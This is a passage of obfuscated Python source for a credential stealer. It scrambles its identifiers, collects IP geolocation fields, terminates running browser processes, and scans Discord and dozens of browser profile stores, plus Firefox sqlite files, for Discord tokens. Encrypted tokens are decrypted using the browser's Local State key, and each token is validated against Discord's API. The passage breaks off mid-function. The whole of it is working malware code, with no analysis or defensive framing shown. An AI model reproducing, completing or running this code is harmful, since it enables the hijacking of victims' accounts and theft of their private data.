    NJMHHGCNQKAYJYHVDMZKFEGVTZWSOVRBMPSQASKBVLLQYUHZBHWQDORWEXNDGVS_code = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('countryCode', "None")
    SVZVLHZGORSOCSZNTRZIGEDMYHTIUIQEPZOPTAGUWNNBXAHZYSXJGFYLMOKZLDFPBLFEKEWEIAVTLTRVQYXWQRVTNMKN = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('regionName', "None")
    SVZVLHZGORSOCSZNTRZIGEDMYHTIUIQEPZOPTAGUWNNBXAHZYSXJGFYLMOKZLDFPBLFEKEWEIAVTLTRVQYXWQRVTNMKN_code = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('region', "None")
    OCUHPSJOFCKJILPFOUIRAMYBZEGKKCVWGVMMNNHTLZGUXLONUVUXNLMRUHIKMHGSADSRVQTBTSWZUZAQQWZBCZ = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('zip', "None")
    OXKJGJYHLXZJOZMCAYMWOJNEGLCBACNCYTBBLFCWMXPEBDLVONYUADUYUSQHWEDPLFEZPSUBIUSNYITGTPIXKXAZDKZT = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('city', "None")
    EQIEETESNZCLVDMFTPRGAYNCANHMUDWVHSKBWMKCMUZOIVBEVKIEANMIVKNYWQTIVJVYHGZYVPKERWZAELQSFDFGLB = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('lat', "None")
    IMFZQVGOVJNFACQJIUVOENHMVWWISXQTOQSFVCAFCIUGDKRXHVWCDPLEYBVCL = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('lon', "None")
    KPMPPBEBUIWVURSXKMEXWDRZCJKBGJIUEXTDYOOETUCGOBTTDZEFRGAQJZSAZQPDQPMLVDJAOXIHFWGREECV = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('timezone', "None")
    EVJFAAYNLFSUWINPDXLGLPJEYFNFJDVNBXNENIIIEGVAWAHWCFWFMIPFCNECSTBBTYMSEWPFLWMRFNBLZDZWIOF = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('isp', "None")
    QYQGHBLSEZEPEBJOPBMYZDINRQTOXKZNJOXHVSVQCXOZZZFHVTPAROJOEVEBRSVIYWBXWQ = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('org', "None")
    XELCLIWFGHVGTXBBOHJYPPHUEZFXRMMGSIBCRPPWXDCPWLGTWJDUFQZCBMOYZEUEAMOPLSZNCBIPWV = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('as', "None")

def AXIHCNNFFPCUHJOOVISNLNSKTRSPVJLGUCPMRPOFLLYEMOUILOUYONVGGKKHGSCZWCQZLNASSICGGWUKMCXHWZTQSWRL(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA):
    import os
    import re
    import json
    import base64
    import requests
    import psutil
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData

    BVMMWKUBZNXXAKQMAGRYZHHKSNZDJIJKGAUBXPIPZLYMEGZOMIMVZOIVSDIRCCAUBFLHWEQAOBHY = ""
    KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW = 0

    def NIPXJBIEYTMZZJRXMUTRJMOTNNTJQOWUYYCMKUGODCDVFFVCDGDRKPOPTBVSKNSYSMOLXDOHZJGWLOTCXJRZDTXJPOBVAJOB():  
        OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR = "https://discord.com/api/v9/users/@me"
        WGKLFGQSZYNUNAONFSXFCDUBLWYEUYMIXUCXDXZQORECDFFEYBJHCUDZHAHPIUBWILXQLGPNR = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        WGKLFGQSZYNUNAONFSXFCDUBLWYEUYMIXUCXDXZQORECDFFEYBJHCUDZHAHPIUBWILXQLGPNR_enc = r"dQw4w9WgXcQ:[^\"]*"
        UQYXTEVQQWKTKAPSRCNJLNYBOQCLEFSGFYIMGRGOVMYZQCHVEZOIUMVRVBWWKJMLUTIYPOIPIDCFAACXPV = []
        YADNQGTPZVVAMHSLCVHJJQKLZLBHTFCQBIYFRYGEXWUEHUFICOIMHRQHSQQTYLSKJJAGQNAKXRRQMHFNNNZVOBWMOGC = []
        KHMRBRFTFIFWYDEVJXIESUSYNWLDEMMNVEOOSFMBDJOZLTMHQTKNNGMUNERFKBHOEBLYCZQCAMFOVXBVPPKXWKWNZAEORZVTSE = {}

        VNCCRMVKSOQCLQKWKELWNEEWCFYWKYVYDIZVUPXRQWXBRXLVPVCPXEGLHT = [
            ("Discord",                os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "discord", "Local Storage", "leveldb"),                                                  ""),
            ("Discord Canary",         os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "discordcanary", "Local Storage", "leveldb"),                                            ""),
            ("Lightcord",              os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "Lightcord", "Local Storage", "leveldb"),                                                ""),
            ("Discord PTB",            os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "discordptb", "Local Storage", "leveldb"),                                               ""),
            ("Opera",                  os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "Opera Software", "Opera Stable", "Local Storage", "leveldb"),                           "opera.exe"),
            ("Opera GX",               os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "Opera Software", "Opera GX Stable", "Local Storage", "leveldb"),                        "opera.exe"),
            ("Opera Neon",             os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "Opera Software", "Opera Neon", "Local Storage", "leveldb"),                             "opera.exe"),
            ("Amigo",                  os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Amigo", "User Data", "Local Storage", "leveldb"),                                       "amigo.exe"),
            ("Torch",                  os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Torch", "User Data", "Local Storage", "leveldb"),                                       "torch.exe"),
            ("Kometa",                 os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Kometa", "User Data", "Local Storage", "leveldb"),                                      "kometa.exe"),
            ("Orbitum",                os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Orbitum", "User Data", "Local Storage", "leveldb"),                                     "orbitum.exe"),
            ("CentBrowser",            os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "CentBrowser", "User Data", "Local Storage", "leveldb"),                                 "centbrowser.exe"),
            ("7Star",                  os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "7Star", "7Star", "User Data", "Local Storage", "leveldb"),                              "7star.exe"),
            ("Sputnik",                os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Sputnik", "Sputnik", "User Data", "Local Storage", "leveldb"),                          "sputnik.exe"),
            ("Vivaldi",                os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Vivaldi", "User Data", "Default", "Local Storage", "leveldb"),                          "vivaldi.exe"),
            ("Google Chrome",          os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome", "User Data", "Default", "Local Storage", "leveldb"),                 "chrome.exe"),
            ("Google Chrome",          os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome", "User Data", "Profile 1", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome", "User Data", "Profile 2", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome", "User Data", "Profile 3", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome", "User Data", "Profile 4", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome", "User Data", "Profile 5", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome SxS",      os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome SxS", "User Data", "Default", "Local Storage", "leveldb"),             "chrome.exe"),
            ("Google Chrome Beta",     os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome Beta", "User Data", "Default", "Local Storage", "leveldb"),            "chrome.exe"),
            ("Google Chrome Dev",      os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome Dev", "User Data", "Default", "Local Storage", "leveldb"),             "chrome.exe"),
            ("Google Chrome Unstable", os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome Unstable", "User Data", "Default", "Local Storage", "leveldb"),        "chrome.exe"),
            ("Google Chrome Canary",   os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Google", "Chrome Canary", "User Data", "Default", "Local Storage", "leveldb"),          "chrome.exe"),
            ("Epic Privacy Browser",   os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Epic Privacy Browser", "User Data", "Local Storage", "leveldb"),                        "epic.exe"),
            ("Microsoft Edge",         os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Microsoft", "Edge", "User Data", "Default", "Local Storage", "leveldb"),                "msedge.exe"),
            ("Uran",                   os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "uCozMedia", "Uran", "User Data", "Default", "Local Storage", "leveldb"),                "uran.exe"),
            ("Yandex",                 os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Yandex", "YandexBrowser", "User Data", "Default", "Local Storage", "leveldb"),          "yandex.exe"),
            ("Yandex Canary",          os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Yandex", "YandexBrowserCanary", "User Data", "Default", "Local Storage", "leveldb"),    "yandex.exe"),
            ("Yandex Developer",       os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Yandex", "YandexBrowserDeveloper", "User Data", "Default", "Local Storage", "leveldb"), "yandex.exe"),
            ("Yandex Beta",            os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Yandex", "YandexBrowserBeta", "User Data", "Default", "Local Storage", "leveldb"),      "yandex.exe"),
            ("Yandex Tech",            os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Yandex", "YandexBrowserTech", "User Data", "Default", "Local Storage", "leveldb"),      "yandex.exe"),
            ("Yandex SxS",             os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Yandex", "YandexBrowserSxS", "User Data", "Default", "Local Storage", "leveldb"),       "yandex.exe"),
            ("Brave",                  os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "BraveSoftware", "Brave-Browser", "User Data", "Default", "Local Storage", "leveldb"),   "brave.exe"),
            ("Iridium",                os.path.join(MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH,   "Iridium", "User Data", "Default", "Local Storage", "leveldb"),                          "iridium.exe"),
        ]

        
        try:
             for RDLMJIHSMTQIQDEOWCHOWGDDXTSLPEGQYKLHXZCOEVFQHRZWJFNJOUWLPBVGKGSXIEZMYPR, GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP, v4r_proc_name in VNCCRMVKSOQCLQKWKELWNEEWCFYWKYVYDIZVUPXRQWXBRXLVPVCPXEGLHT:
                for v4r_proc in psutil.process_iter(['pid', 'name']):
                    try:
                        if v4r_proc.name().lower() == v4r_proc_name.lower():
                            v4r_proc.terminate()
                    except: pass
        except: pass

        for RDLMJIHSMTQIQDEOWCHOWGDDXTSLPEGQYKLHXZCOEVFQHRZWJFNJOUWLPBVGKGSXIEZMYPR, GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP, v4r_proc_name in VNCCRMVKSOQCLQKWKELWNEEWCFYWKYVYDIZVUPXRQWXBRXLVPVCPXEGLHT:
            if not os.path.exists(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP):

                continue
            CUOEENUJMTRPFLEIUTJTJRSSNDAUFONTXCJLUFZEGPGZKTRAAYZOVVCQZM = RDLMJIHSMTQIQDEOWCHOWGDDXTSLPEGQYKLHXZCOEVFQHRZWJFNJOUWLPBVGKGSXIEZMYPR.replace(" ", "").lower()
            if "cord" in GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP:
                if not os.path.exists(os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, CUOEENUJMTRPFLEIUTJTJRSSNDAUFONTXCJLUFZEGPGZKTRAAYZOVVCQZM, 'Local State')):
                    continue
                for v4r_file_name in os.listdir(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    STQNZXQXDOCZYHPXOIOZLSHEVQRWHDWNADTFXGZJVTUDDVAQGSGYTDYUAAMYBBCLATC = os.path.join(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP, v4r_file_name)
                    if os.path.exists(STQNZXQXDOCZYHPXOIOZLSHEVQRWHDWNADTFXGZJVTUDDVAQGSGYTDYUAAMYBBCLATC):
                        with open(STQNZXQXDOCZYHPXOIOZLSHEVQRWHDWNADTFXGZJVTUDDVAQGSGYTDYUAAMYBBCLATC, errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for y in re.findall(WGKLFGQSZYNUNAONFSXFCDUBLWYEUYMIXUCXDXZQORECDFFEYBJHCUDZHAHPIUBWILXQLGPNR_enc, v4r_line.strip()):
                                    SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF = TLXUTQJMRDLYGDUGCTIUWOIVDCJVWUNVOLDLXUTZJMKFAISUBOKNKFLOIQUHTYTLKLGIXXLUMPMKINICKGFMEUVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), JULSAQPUVEJWAHYMMLSDBSHOQUELVCDHQSKVHTAOJBGMDEEUFFWWFOYRSJXHZQN(os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, CUOEENUJMTRPFLEIUTJTJRSSNDAUFONTXCJLUFZEGPGZKTRAAYZOVVCQZM, 'Local State')))
                                    if UWWXOJKHBITFBNPJSMKIHUEJYHYGETJVDWQGWOQFNDYQNMMQFOJ(SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF, OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR):
                                        WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA = requests.get(OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR, headers={'Authorization': SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF}).json()['id']
                                        if WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA not in YADNQGTPZVVAMHSLCVHJJQKLZLBHTFCQBIYFRYGEXWUEHUFICOIMHRQHSQQTYLSKJJAGQNAKXRRQMHFNNNZVOBWMOGC:
                                            UQYXTEVQQWKTKAPSRCNJLNYBOQCLEFSGFYIMGRGOVMYZQCHVEZOIUMVRVBWWKJMLUTIYPOIPIDCFAACXPV.append(SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF)
                                            YADNQGTPZVVAMHSLCVHJJQKLZLBHTFCQBIYFRYGEXWUEHUFICOIMHRQHSQQTYLSKJJAGQNAKXRRQMHFNNNZVOBWMOGC.append(WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA)
                                            KHMRBRFTFIFWYDEVJXIESUSYNWLDEMMNVEOOSFMBDJOZLTMHQTKNNGMUNERFKBHOEBLYCZQCAMFOVXBVPPKXWKWNZAEORZVTSE[SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF] = (RDLMJIHSMTQIQDEOWCHOWGDDXTSLPEGQYKLHXZCOEVFQHRZWJFNJOUWLPBVGKGSXIEZMYPR, STQNZXQXDOCZYHPXOIOZLSHEVQRWHDWNADTFXGZJVTUDDVAQGSGYTDYUAAMYBBCLATC)
            else:
                for v4r_file_name in os.listdir(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    STQNZXQXDOCZYHPXOIOZLSHEVQRWHDWNADTFXGZJVTUDDVAQGSGYTDYUAAMYBBCLATC = os.path.join(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP, v4r_file_name)
                    if os.path.exists(STQNZXQXDOCZYHPXOIOZLSHEVQRWHDWNADTFXGZJVTUDDVAQGSGYTDYUAAMYBBCLATC):
                        with open(STQNZXQXDOCZYHPXOIOZLSHEVQRWHDWNADTFXGZJVTUDDVAQGSGYTDYUAAMYBBCLATC, errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF in re.findall(WGKLFGQSZYNUNAONFSXFCDUBLWYEUYMIXUCXDXZQORECDFFEYBJHCUDZHAHPIUBWILXQLGPNR, v4r_line.strip()):
                                    if UWWXOJKHBITFBNPJSMKIHUEJYHYGETJVDWQGWOQFNDYQNMMQFOJ(SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF, OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR):
                                        WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA = requests.get(OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR, headers={'Authorization': SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF}).json()['id']
                                        if WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA not in YADNQGTPZVVAMHSLCVHJJQKLZLBHTFCQBIYFRYGEXWUEHUFICOIMHRQHSQQTYLSKJJAGQNAKXRRQMHFNNNZVOBWMOGC:
                                            UQYXTEVQQWKTKAPSRCNJLNYBOQCLEFSGFYIMGRGOVMYZQCHVEZOIUMVRVBWWKJMLUTIYPOIPIDCFAACXPV.append(SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF)
                                            YADNQGTPZVVAMHSLCVHJJQKLZLBHTFCQBIYFRYGEXWUEHUFICOIMHRQHSQQTYLSKJJAGQNAKXRRQMHFNNNZVOBWMOGC.append(WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA)
                                            KHMRBRFTFIFWYDEVJXIESUSYNWLDEMMNVEOOSFMBDJOZLTMHQTKNNGMUNERFKBHOEBLYCZQCAMFOVXBVPPKXWKWNZAEORZVTSE[SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF] = (RDLMJIHSMTQIQDEOWCHOWGDDXTSLPEGQYKLHXZCOEVFQHRZWJFNJOUWLPBVGKGSXIEZMYPR, STQNZXQXDOCZYHPXOIOZLSHEVQRWHDWNADTFXGZJVTUDDVAQGSGYTDYUAAMYBBCLATC)

        if os.path.exists(os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "Mozilla", "Firefox", "Profiles")):
            for GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP, _, v4r_files in os.walk(os.path.join(BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA, "Mozilla", "Firefox", "Profiles")):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(os.path.join(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP, v4r__file), errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF in re.findall(WGKLFGQSZYNUNAONFSXFCDUBLWYEUYMIXUCXDXZQORECDFFEYBJHCUDZHAHPIUBWILXQLGPNR, v4r_line.strip()):
                                    if UWWXOJKHBITFBNPJSMKIHUEJYHYGETJVDWQGWOQFNDYQNMMQFOJ(SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF, OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR):
                                        WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA = requests.get(OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR, headers={'Authorization': SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF}).json()['id']
                                        if WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA not in YADNQGTPZVVAMHSLCVHJJQKLZLBHTFCQBIYFRYGEXWUEHUFICOIMHRQHSQQTYLSKJJAGQNAKXRRQMHFNNNZVOBWMOGC:
                                            UQYXTEVQQWKTKAPSRCNJLNYBOQCLEFSGFYIMGRGOVMYZQCHVEZOIUMVRVBWWKJMLUTIYPOIPIDCFAACXPV.append(SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF)
                                            YADNQGTPZVVAMHSLCVHJJQKLZLBHTFCQBIYFRYGEXWUEHUFICOIMHRQHSQQTYLSKJJAGQNAKXRRQMHFNNNZVOBWMOGC.append(WTFYBXRTSMGRRAZAEIOIDTOQJLUNYBJPUXLMGXPVUTLXXOKLYPA)
                                            KHMRBRFTFIFWYDEVJXIESUSYNWLDEMMNVEOOSFMBDJOZLTMHQTKNNGMUNERFKBHOEBLYCZQCAMFOVXBVPPKXWKWNZAEORZVTSE[SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF] = ('Firefox', os.path.join(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP, v4r__file))
        return UQYXTEVQQWKTKAPSRCNJLNYBOQCLEFSGFYIMGRGOVMYZQCHVEZOIUMVRVBWWKJMLUTIYPOIPIDCFAACXPV, KHMRBRFTFIFWYDEVJXIESUSYNWLDEMMNVEOOSFMBDJOZLTMHQTKNNGMUNERFKBHOEBLYCZQCAMFOVXBVPPKXWKWNZAEORZVTSE

    def UWWXOJKHBITFBNPJSMKIHUEJYHYGETJVDWQGWOQFNDYQNMMQFOJ(SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF, OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR):
        return requests.get(OMBSBJDHPJIBJWYJAPKLBQPMWRHJNYGNJDCOLUJBTEJQNVLWUZSQZPPBYYR, headers={'Authorization': SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF}).status_code == 200

    def TLXUTQJMRDLYGDUGCTIUWOIVDCJVWUNVOLDLXUTZJMKFAISUBOKNKFLOIQUHTYTLKLGIXXLUMPMKINICKGFMEUVal(WBLILGDKVLBWJCQUKZYYMXPHFBWSFKHYVUGBUXTEZIURQHIXHBVQFLNRMBMYERFZHRAOKEQZWJFFGCUEVDNQBSVFLKOM, EHPGQYGKKVNRYHUGMXYLMCVPDUOFNKWGHLQACMAFPBJOXZZNWJXSLCNQTSQGRABPMXP):
